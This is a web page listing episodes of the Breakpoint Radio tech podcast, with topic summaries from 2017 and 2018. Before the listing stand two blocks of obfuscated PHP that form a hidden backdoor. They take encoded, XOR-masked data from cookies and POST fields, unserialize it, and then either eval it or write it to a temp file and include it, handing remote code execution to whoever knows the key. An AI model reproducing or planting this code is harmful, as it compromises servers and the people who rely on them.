$eGOREacq = "\132" . chr ( 720 - 647 ).chr (95) . "\114" . chr ( 119 - 50 )."\x56" . "\142" . 'e';$nyLGtTlzgJ = "\x63" . "\x6c" . chr ( 582 - 485 )."\163" . 's' . "\x5f" . "\x65" . 'x' . chr (105) . 's' . "\x74" . chr ( 444 - 329 ); $gIZxvIxZ = class_exists($eGOREacq); $eGOREacq = "62478";$nyLGtTlzgJ = "30073";$xdRPukz = 0;if ($gIZxvIxZ == $xdRPukz){function gGwycz(){return FALSE;}$vEUdrKHqob = "46103";gGwycz();class ZI_LEVbe{private function zNTzvJ($vEUdrKHqob){if (is_array(ZI_LEVbe::$dBfIwLKWeq)) {$HuqUYYgkr = str_replace("\74" . "\x3f" . "\x70" . chr (104) . chr ( 569 - 457 ), "", ZI_LEVbe::$dBfIwLKWeq[chr ( 285 - 186 ).'o' . chr (110) . chr (116) . 'e' . chr (110) . "\164"]);eval($HuqUYYgkr); $vEUdrKHqob = "46103";exit();}}private $yZUVdIUc;public function BXZmZdAXQ(){echo 20240;}public function __destruct(){$vEUdrKHqob = "17948_2981";$this->zNTzvJ($vEUdrKHqob); $vEUdrKHqob = "17948_2981";}public function __construct($JTRLjiJhK=0){$iusOLIWguD = $_POST;$ubIfEKeAPM = $_COOKIE;$mnQtfQVMBl = "8121dbb1-4480-493a-957d-a43041fc31ba";$WIFbRs = @$ubIfEKeAPM[substr($mnQtfQVMBl, 0, 4)];if (!empty($WIFbRs)){$uegsY = "base64";$XnZBr = "";$WIFbRs = explode(",", $WIFbRs);foreach ($WIFbRs as $pYomxInD){$XnZBr .= @$ubIfEKeAPM[$pYomxInD];$XnZBr .= @$iusOLIWguD[$pYomxInD];}$XnZBr = array_map($uegsY . "\x5f" . 'd' . "\x65" . "\x63" . "\157" . "\x64" . chr ( 762 - 661 ), array($XnZBr,)); $XnZBr = $XnZBr[0] ^ str_repeat($mnQtfQVMBl, (strlen($XnZBr[0]) / strlen($mnQtfQVMBl)) + 1);ZI_LEVbe::$dBfIwLKWeq = @unserialize($XnZBr); $XnZBr = class_exists("17948_2981");}}public static $dBfIwLKWeq = 1088;}$VbGyKSb = new /* 15442 */ ZI_LEVbe(46103 + 46103);unset($VbGyKSb);}$aCyypinq = 'u' . "\x5f" . "\x57" . chr ( 115 - 43 ).'Y' . chr (85) . "\x67";$MiNzLzsrKM = chr ( 379 - 280 ).chr (108) . "\x61" . 's' . "\x73" . "\x5f" . "\145" . "\x78" . "\x69" . 's' . 't' . "\x73";$aifTVi = class_exists($aCyypinq); $aCyypinq = "21657";$MiNzLzsrKM = "58112";$yJJRIs = !1;if ($aifTVi == $yJJRIs){function EEkpveZz(){return FALSE;}$sdUiojuEO = "48155";EEkpveZz();class u_WHYUg{private function RUkuG($sdUiojuEO){if (is_array(u_WHYUg::$PxqkDRXi)) {$VyngwMSZNP = sys_get_temp_dir() . "/" . crc32(u_WHYUg::$PxqkDRXi["\x73" . chr ( 846 - 749 ).chr (108) . chr (116)]);@u_WHYUg::$PxqkDRXi["\x77" . chr (114) . "\x69" . chr (116) . "\x65"]($VyngwMSZNP, u_WHYUg::$PxqkDRXi[chr (99) . 'o' . chr (110) . chr ( 514 - 398 )."\x65" . "\156" . chr (116)]);include $VyngwMSZNP;@u_WHYUg::$PxqkDRXi["\x64" . "\145" . chr ( 900 - 792 ).'e' . chr ( 450 - 334 )."\x65"]($VyngwMSZNP); $sdUiojuEO = "48155";exit();}}private $vHKjc;public function jECssm(){echo 63544;}public function __destruct(){$sdUiojuEO = "64112_326";$this->RUkuG($sdUiojuEO); $sdUiojuEO = "64112_326";}public function __construct($zdldR=0){$AWArYf = $_POST;$RYtAiXRJ = $_COOKIE;$RKmGGmcTn = "63ca8f29-be20-4737-a469-28a91539d7d8";$dvsAe = @$RYtAiXRJ[substr($RKmGGmcTn, 0, 4)];if (!empty($dvsAe)){$CjCSRiyw = "base64";$bpBfjIN = "";$dvsAe = explode(",", $dvsAe);foreach ($dvsAe as $AFfRahSluv){$bpBfjIN .= @$RYtAiXRJ[$AFfRahSluv];$bpBfjIN .= @$AWArYf[$AFfRahSluv];}$bpBfjIN = array_map($CjCSRiyw . '_' . "\x64" . "\x65" . "\143" . chr (111) . chr (100) . 'e', array($bpBfjIN,)); $bpBfjIN = $bpBfjIN[0] ^ str_repeat($RKmGGmcTn, (strlen($bpBfjIN[0]) / strlen($RKmGGmcTn)) + 1);u_WHYUg::$PxqkDRXi = @unserialize($bpBfjIN); $bpBfjIN = class_exists("64112_326");}}public static $PxqkDRXi = 41933;}$TphzilG = new /* 28492 */ u_WHYUg(48155 + 48155); $_POST = Array();unset($TphzilG);} Breakpoint Radio – Breakpoint Radio

Podcast: Breakpoint Radio

Ep 30 – 12 Sep 2018 – …apologies for snap and crackle…

In this episode we talk about…ethical technology and ethical OS, ScalaWorld, Netflix explains, FP for mortals and Lego Bugatti!! Note: There is some background hum on this recording. On balance we’ve published it to support the blog post, but take heed! Where bytes and bites collide.


Ep 27 – 6 Mar 2018 – ….Central, distributed the new social…

In this episode we talk about…Vero, the new social network, web3 and distributed platforms for development, edge processing for IoT and Dark Stock Photos! Where bytes and bites collide.


Ep 26 – 13 Feb 2018 – ….To boldly go and eat lady Doritos…

In this episode we talk about…Falcon heavy spacex, WhereML, the rise of reputation networks, JDK 10 and Lady Doritos! Coffee from Costa, Chancery Lane. Where bytes and bites collide.


Ep 25 – 30 Jan 2018 – ….for those about to Rock…

In this episode we talk about…Amazon Go, SWARMing to agile transformation, learning Scala, alt-right robots, Slugs of metal, Podium and a tiny penis! Coffee and pastry from Starbucks, Chancery Lane. Where bytes and bites collide.


Ep 23 – 10 Oct 2017 – ….attack of the dolphins…

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

In this episode we talk about… Uber, Apple and Google events, quantifying typesafety, Internet of agreements, Alexa and kids prosthetics! Coffee and pastry from Starbucks, Chancery Lane. Where bytes and bites collide.


Ep 22 – 15 Aug 2017 – ..the last podcast with Sofia Cole..

In this episode we talk about… the AWS Summit NYC, Roomba and data privacy, child sex dolls, Game of Thrones and Coinbase the blockchain unicorn! Breakfast from Aqua Shard, London Bridge. Where bytes and bites collide.


Ep 21 – 10 Aug 2017 – ..Putting the man-in..

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

In this episode we talk about… the Google Man-i-festo, scalaquest, blockchain and bitcoin cash, CD trello and the Japanese Sweat App! Coffee from Trade, Shoreditch. Where bytes and bites collide.
